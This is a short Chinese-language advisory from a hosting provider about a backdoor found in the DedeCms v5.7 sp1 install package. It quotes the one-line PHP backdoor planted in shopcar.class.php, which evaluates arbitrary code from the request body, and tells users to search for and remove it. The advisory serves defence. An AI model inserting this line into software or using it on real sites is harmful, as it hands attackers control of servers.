無憂主機（www.gle-technology.com）今天在閱讀業(yè)內(nèi)新聞，看到一則最新關(guān)于dedecms內(nèi)容管理系統(tǒng)被植入后門的代碼，非常危險，這個后臺將有可能泄漏網(wǎng)站資料或被控制對外攻擊，對用戶網(wǎng)站威脅巨大。詳細信息如下： 3月22 日消息，瑞星與 360 今日對外發(fā)布警示，稱國內(nèi)知名的 PHP 開源網(wǎng)站管理系統(tǒng)織夢 CMS（DedeCms）v5.7 sp1 版本安裝包被發(fā)現(xiàn)植入后門，黑客可通過此后門直接獲得網(wǎng)站的控制權(quán)限，進而上傳攻擊腳本，利用用戶網(wǎng)站對外發(fā)動攻擊，并能夠控制用戶的網(wǎng)站進而對服務器安全和穩(wěn)定造成威脅。 安全界人士分析發(fā)現(xiàn)，此次織夢CMS 曝出的后門惡意代碼存在于購物車類文件（shopcar.class.php）中，此類文件被植入一句后門代碼“@eval (file_get_contents('php://input'));”。凡是調(diào)用該購物車類的文件均會觸發(fā)后門，嚴重威脅服務器的安全和穩(wěn)定，進而控制用戶網(wǎng)站漁利或進行其它非法行為。 無憂主機（www.gle-technology.com）在使用dedecms系統(tǒng)的用戶密切關(guān)注dedecms官方動向，如有更新補丁請及時升級更新。無憂主機建議用戶把dedecms的站點源代碼下載到本地，利用文本替換器，查找搜索“@eval(file_get_contents ('php://input'));” 判斷自己的代碼中是否存在這個后門代碼，如果有請及時刪除。 相關(guān)鏈接： 織夢CMS系統(tǒng)被曝植入后門70萬網(wǎng)站資料或泄露 無憂主機（www.gle-technology.com）提醒用戶，請及時檢查并做好dedecms v5.7 sp1升級防御工作。凡發(fā)現(xiàn)，此漏洞給服務器帶來嚴重安全問題的，我公司為保障服務器用戶網(wǎng)站安全為由，dedecms v5.7 sp1存在嚴重安全漏洞為由關(guān)停站點，直至該漏洞被修復。 純Linux環(huán)境下高端免備案［香港獨立IP地址］ php空間，僅僅只需199元一年起。商務中國域名核心代理直銷50元注冊國際頂級域名

本文地址：http://www.gle-technology.com/dedecms/5411.html